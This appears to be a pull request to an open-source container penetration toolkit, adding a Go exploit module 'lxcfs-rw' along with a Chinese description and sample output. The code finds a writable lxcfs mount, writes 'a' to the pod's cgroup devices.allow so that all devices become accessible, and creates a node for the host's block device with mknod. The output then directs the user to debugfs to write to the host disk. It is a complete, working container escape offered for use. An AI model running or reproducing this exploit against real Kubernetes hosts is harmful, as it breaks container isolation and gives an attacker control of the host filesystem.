### PR TITLE
add lxcfs-rw escape

### DIFF
--- a/pkg/exploit/lxcfs_rw.go
+++ b/pkg/exploit/lxcfs_rw.go
@@ -1,0 +1,222 @@
+package exploit
+
+import (
+	"bufio"
+	"fmt"
+	"github.com/cdk-team/CDK/pkg/plugin"
+	"io/ioutil"
+	"log"
+	"os"
+	"path"
+	"strconv"
+	"strings"
+	"syscall"
+)
+
+const mountInfoPath 	string = "/proc/self/mountinfo"
+const cgroupDevicePath	string = "/sys/fs/cgroup/devices"
+const hostDeviceFlag	string = "/etc/hosts"
+const devicesAllowName	string = "devices.allow"
+const devicesListName	string = "devices.list"
+
+type mountInfo struct {
+	Device		string
+	Fstype		string
+	Root		string
+	MountPoint	string
+	Opts		[]string
+	Marjor		string
+	Minor		string
+}
+
+func getMountInfo() ([]mountInfo, error) {
+	f, err := os.Open(mountInfoPath)
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	var ret []string
+
+	r := bufio.NewReader(f)
+	for {
+		line, err := r.ReadString('\n')
+		if err != nil {
+			break
+		}
+		ret = append(ret, strings.Trim(line, "\n"))
+	}
+	// 2346 2345 0:261 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
+	mountInfos := make([]mountInfo, len(ret))
+
+	for _, r := range ret {
+		parts := strings.Split(r, " - ")
+		if len(parts) != 2 {
+			return nil, fmt.Errorf("found invalid mountinfo line in file %s: %s ", mountInfoPath, r)
+		}
+		mi := mountInfo{}
+		fields := strings.Fields(parts[0])
+		mi.Root = fields[3]
+		mi.MountPoint = fields[4]
+		mi.Opts = strings.Split(fields[5], ",")
+		blockId := strings.Split(fields[2], ":")
+		if len(blockId) != 2 {
+			return nil, fmt.Errorf("found invalid mountinfo line in file %s: %s ", mountInfoPath, r)
+		}
+		mi.Marjor = blockId[0]
+		mi.Minor = blockId[1]
+		fields = strings.Fields(parts[1])
+		mi.Device = fields[1]
+		mi.Fstype = fields[0]
+		mountInfos = append(mountInfos, mi)
+	}
+
+	return mountInfos, err
+}
+
+// find rw lxcfs
+func findTargetMountPoint(mi *mountInfo) bool {
+	if mi.Device == "lxcfs" {
+		for _, opt := range mi.Opts {
+			if opt == "rw" {
+				log.Printf("found rw lxcfs mountpoint: %s\n", mi.MountPoint)
+				return true
+			}
+		}
+	}
+	return false
+}
+
+// find pods cgroup devices path
+func findDevicesAllowPath(mi *mountInfo) bool {
+	if mi.MountPoint == cgroupDevicePath {
+		log.Printf("found pod devices.allow path: %s\n", mi.Root)
+		return true
+	}
+	return false
+}
+
+// find block device id
+func findTargetDeviceID(mi *mountInfo) bool {
+	if mi.MountPoint == hostDeviceFlag {
+		log.Printf("found host blockDeviceId Marjor: %s Minor: %s\n", mi.Marjor, mi.Minor)
+		return true
+	}
+	return false
+}
+
+// set all block device accessible
+func setBlockAccessible(path string) error {
+	f, err := os.OpenFile(path, os.O_WRONLY|os.O_SYNC, 0200)
+	if err != nil {
+		return fmt.Errorf("open devices.allow failed. %v\n", err)
+	}
+	defer f.Close()
+
+	l, err := f.Write([]byte("a"))
+	if err != nil {
+		return fmt.Errorf("write devices.allow failed. %v\n", err)
+	}
+
+	if l != 1 {
+		return fmt.Errorf("write \"a\" to devices.allow failed.\n")
+	}
+	log.Printf("set all block device accessible success.\n")
+
+	return nil
+}
+
+func getDevicesAllow(path string) string {
+	f, err := os.Open(path)
+	if err != nil {
+		log.Printf("open devices.list failed. %v\n", err)
+		return ""
+	}
+	defer f.Close()
+
+	b ,err := ioutil.ReadAll(f)
+	if err != nil {
+		log.Printf("read devices.list failed. %v\n", err)
+		return ""
+	}
+
+	return string(b)
+}
+
+func makeDev(major, minor string) int {
+	ret1, err := strconv.ParseInt(major, 10, 64)
+	if err != nil {
+		log.Printf("convert major number to int64 err: %v\n", err)
+		return 0
+	}
+	ret2, err := strconv.ParseInt(minor, 10, 64)
+	if err != nil {
+		log.Printf("convert minor number to int64 err: %v\n", err)
+		return 0
+	}
+
+	return int(((ret1 & 0xfff) << 8) | (ret2 & 0xff) | ((ret1 &^ 0xfff) << 32) | ((ret2 & 0xfffff00) << 12))
+}
+
+type lxcfsRWS struct {}
+
+func (l lxcfsRWS) Desc() string {
+	return "escape container when root has LXCFS read & write privilege,  usage: `./cdk run lxcfs-rw`"
+}
+
+func (l lxcfsRWS) Run() bool {
+	var targetMountPoint 	string
+	var podCgroupPath 		string
+	var devicesAllowPath, devicesListPath 	string
+	var deviceMarjor, deviceMinor string
+
+	mountInfos, err := getMountInfo()
+	if err != nil {
+		log.Printf("%v", err)
+		return false
+	}
+
+	for _, mi := range mountInfos {
+		if findTargetMountPoint(&mi) {
+			targetMountPoint = mi.MountPoint
+		}
+		if findDevicesAllowPath(&mi) {
+			podCgroupPath = mi.Root
+		}
+		if findTargetDeviceID(&mi) {
+			deviceMarjor = mi.Marjor
+			deviceMinor = mi.Minor
+		}
+	}
+
+	devicesAllowPath = path.Join(targetMountPoint, "cgroup/devices", podCgroupPath, devicesAllowName)
+	devicesListPath = path.Join(targetMountPoint, "cgroup/devices", podCgroupPath, devicesListName)
+
+	err = setBlockAccessible(devicesAllowPath)
+	if err != nil {
+		log.Printf("%v", err)
+		return false
+	}
+	devicesAllow := getDevicesAllow(devicesListPath)
+	log.Printf("devices.allow content: %s", devicesAllow)
+	if strings.Contains(devicesAllow,  "a *:* rwm") {
+		dev := makeDev(deviceMarjor, deviceMinor)
+		if dev == 0 {
+			log.Printf("Blockdevice Marjor/Minor number invalid.")
+			return false
+		}
+		err = syscall.Mknod("./host_dev", syscall.S_IFBLK|uint32(os.FileMode(0700)), dev)
+		if err != nil {
+			log.Printf("mknod err: %v", err)
+			return false
+		}
+		log.Printf("exploit success, run \"debugfs -w host_dev\".")
+		return true
+	}
+	return false
+}
+
+func init() {
+	exploit := lxcfsRWS{}
+	plugin.RegisterExploit("lxcfs-rw", exploit)
+}


### PR DESCRIPTION
添加当容器内 lxcfs 可写当情况下的利用
![image](https://user-images.githubusercontent.com/11347901/106087288-a780fa80-615e-11eb-9dff-7a54f0382554.png)

output:
```
/tmp # ./cdk run lxcfs-rw
2021/01/27 16:30:17 found pod devices.allow path: /kubepods/burstable/pod3453dde3-3ede-11eb-bff3-5254005e6516/8ca73287248fc9f72f6d502db9406edeca5acacd85b466b68d7ad4810e3bf7e5
2021/01/27 16:30:17 found rw lxcfs mountpoint: /data/monitor/lxcfs
2021/01/27 16:30:17 found host blockDeviceId Marjor: 253 Minor: 1
2021/01/27 16:30:17 set all block device accessible success.
2021/01/27 16:30:17 devices.allow content: a *:* rwm
2021/01/27 16:30:17 exploit success, run "debugfs -w host_dev".
```

利用效果:
![image](https://user-images.githubusercontent.com/11347901/106087123-4eb16200-615e-11eb-8885-76475241847a.png)

